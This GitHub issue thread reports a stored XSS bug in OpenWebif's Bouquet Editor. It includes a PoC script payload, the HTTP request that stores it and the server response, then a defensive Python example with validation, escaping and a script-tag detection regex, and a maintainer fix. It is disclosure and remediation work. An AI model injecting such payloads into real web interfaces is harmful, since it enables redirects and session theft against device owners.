Stored XSS bug #1387

Closed
kozmer opened this issue Aug 4, 2021 · 2 comments
Labels
BUG 🐞 Not working as expected

Comments


kozmer commented Aug 4, 2021

Description
Inserting JavaScript code into the "Add Bouquet" function in the Bouquet Editor leads to Stored XSS. The payload in the PoC executes each time the user goes to the OWIF interface and redirects to a different webpage.

PoC/Reproduction
Link to streamable

Image

  • OS: [OpenATV]
  • Version: [6.4]

Desktop

  • Browser: [Firefox]
  • Version: [90.0.2]

Stored userbouquets

$ cat /etc/enigma2/userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv

#NAME <script>alert(document.domain);window.location.replace("https://github.com/kozmer");</script> (TV)


$ cat /etc/enigma2/bouquets.tv

#NAME Bouquets (TV)
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv" ORDER BY bouquet

Request

GET /bouqueteditor/api/addbouquet?name=%3Cscript%3Ewindow.location.replace(%22https%3A%2F%2Fgithub.com%2Fkozmer%22)%3B%3C%2Fscript%3E&mode=0&_=1628087265204 HTTP/1.1
Host: 192.168.0.22
User-Agent: Mozilla/5.0 (Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://192.168.0.22/
Cookie: TWISTED_SESSION=<removed>
Sec-GPC: 1


HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 13:28:22 GMT
Connection: close
Content-Type: text/plain
Server: TwistedWeb/16.4.0
Content-Length: 116

{"Result": [true, "Bouquet <script>window.location.replace(\"https://github.com/kozmer\");</script> (TV) created."]}
kozmer added the label BUG 🐞 Not working as expected on Aug 4, 2021
kozmer changed the title from "Stored XSS bug." to "Stored XSS bug" on Aug 4, 2021

wedebe (Collaborator) commented Aug 4, 2021

Does Twisted have a lib to sanitise all:

  • url param inputs
  • xml & json responses?
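Added example, written for this thread and not taken from the OpenWebif project, its Twisted dependency, or either commenter: it takes the bouquet name from the report's PoC as constructed input and shows the two layers that stop this class of stored XSS, validation at the URL-parameter boundary and HTML output encoding in the JSON message and any rendered list. The `bouquet_filename` helper reproduces the file name visible in the report's `cat` listing (lower-case, non-alphanumerics replaced by `_`); that rule is an assumption checked only against that one sample. Function names and the length limit are hypothetical.

```python
import html
import json
import re

# Constructed sample input: the bouquet name from the report's PoC.
POC_NAME = ('<script>alert(document.domain);'
            'window.location.replace("https://github.com/kozmer");</script>')

# The response body as it appears in the report (name echoed unescaped).
REPORTED_RESPONSE = ('{"Result": [true, "Bouquet <script>window.location.replace('
                     '\\"https://github.com/kozmer\\");</script> (TV) created."]}')

# Hypothetical input policy: printable characters only, no HTML
# metacharacters, bounded length. Enforced before anything is stored.
_DISALLOWED = re.compile(r'[<>"\'&\x00-\x1f\x7f]')
MAX_NAME_LEN = 64


def validate_bouquet_name(name: str) -> bool:
    """True if the name may be stored, False otherwise (input-boundary check)."""
    if not name or len(name) > MAX_NAME_LEN:
        return False
    return _DISALLOWED.search(name) is None


def bouquet_filename(name: str, mode: str = "tv") -> str:
    """Derive the userbouquet file name: '<name> (TV)' lower-cased, every
    non-alphanumeric character mapped to '_'. Assumed rule, matched only
    against the file name shown in the report."""
    slug = re.sub(r"[^a-z0-9]", "_", f"{name} ({mode.upper()})".lower())
    return f"userbouquet.{slug}.{mode}"


def escape_for_html(text: str) -> str:
    """Output encoding for an HTML text or attribute context."""
    return html.escape(text, quote=True)


def add_bouquet_response(name: str, mode: str = "TV") -> str:
    """JSON body in the shape the report shows, but with the name HTML-escaped
    so it stays inert if a client drops the message into the page as HTML.
    json.dumps alone escapes quotes, not '<' and '>'."""
    msg = f"Bouquet {escape_for_html(name)} ({mode}) created."
    return json.dumps({"Result": [True, msg]})


def render_bouquet_list(names) -> str:
    """Render stored bouquet names as an HTML list, escaping each item."""
    items = "".join(f"<li>{escape_for_html(n)}</li>" for n in names)
    return f"<ul>{items}</ul>"


def contains_script_tag(text: str) -> bool:
    """Detection helper: does a raw <script ...> or </script> survive in text?"""
    return re.search(r"<\s*/?\s*script\b", text, re.I) is not None


def handle_add_bouquet(name: str) -> str:
    """Both layers together: reject bad input, and encode on output regardless."""
    if not validate_bouquet_name(name):
        return json.dumps({"Result": [False, "Invalid bouquet name."]})
    return add_bouquet_response(name)


if __name__ == "__main__":
    print(bouquet_filename(POC_NAME))
    print(handle_add_bouquet(POC_NAME))
    print(handle_add_bouquet("Sports HD"))
    print(render_bouquet_list([POC_NAME, "Sports HD"]))
```

Validation alone is the weaker of the two layers: names that already sit in `/etc/enigma2` bypass it, and a future editor may relax the character policy. Escaping at every output point (the JSON message, the bouquet list, any `#NAME` line rendered back into the UI) keeps stored names inert whatever the input rule was when they were written.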

jbleyel added a commit that referenced this issue Aug 5, 2021
jbleyel (Contributor) commented Aug 5, 2021

Many thanks... please check the latest version.

@jbleyel jbleyel closed this as completed Sep 2, 2021